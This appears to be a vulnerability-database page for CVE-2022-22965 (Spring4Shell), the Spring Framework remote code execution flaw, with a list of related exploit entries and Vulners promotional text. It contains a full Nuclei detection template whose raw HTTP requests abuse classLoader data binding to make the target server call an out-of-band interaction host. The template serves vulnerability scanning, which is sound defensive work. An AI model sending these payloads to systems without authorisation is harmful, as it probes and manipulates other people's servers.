| Reporter | Title | Published | Views | Family All 313 |
|---|---|---|---|---|
| Exploit for Code Injection in Vmware Spring_Framework | 31 Mar 202219:19 | – | githubexploit | |
| Exploit for Code Injection in Vmware Spring_Framework | 20 Jun 202311:45 | – | githubexploit | |
| Exploit for Code Injection in Vmware Spring_Framework | 4 Apr 202210:37 | – | githubexploit | |
| Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware | 19 Mar 202615:19 | – | githubexploit | |
| Exploit for CVE-2020-1938 | 29 Nov 202508:31 | – | githubexploit | |
| Exploit for Code Injection in Vmware Spring_Framework | 1 Mar 202620:00 | – | githubexploit | |
| Exploit for Code Injection in Vmware Spring_Framework | 5 Apr 202215:45 | – | githubexploit | |
| Exploit for Code Injection in Vmware Spring_Framework | 31 Mar 202215:01 | – | githubexploit | |
| Exploit for Code Injection in Vmware Spring_Framework | 2 Nov 202400:26 | – | githubexploit | |
| Exploit for Code Injection in Vmware Spring_Framework | 14 Jan 202607:45 | – | githubexploit |
id: CVE-2022-22965
info:
name: Spring - Remote Code Execution
author: justmumu,arall,dhiyaneshDK,akincibor
severity: critical
description: |
Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit.
reference:
- https://tanzu.vmware.com/security/cve-2022-22965
- https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
- https://twitter.com/RandoriAttack/status/1509298490106593283
- https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw
- https://twitter.com/_0xf4n9x_/status/1509935429365100546
- https://nvd.nist.gov/vuln/detail/cve-2022-22965
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-22965
cwe-id: CWE-94
epss-score: 0.99677
epss-percentile: 0.99948
cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*
metadata:
max-request: 4
vendor: vmware
product: spring_framework
tags: cve2022,cve,rce,spring,injection,oast,intrusive,kev,vmware,vkev,vuln
http:
- raw:
- |
POST {{BaseURL}} HTTP/1.1
Content-Type: application/x-www-form-urlencoded
class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- |
GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
payloads:
interact_protocol:
- "http"
- https
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: Java"
case-insensitive: true
# digest: 4a0a00473045022026fcce45a31f9fc4262fb5ce2e002b9cb0cfbf8281997cb910f51e24ff78b9b70221008ada9679d5b1356b07db53f05f0f2f36fd50e05a6a674a58102dc35e8a030595:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation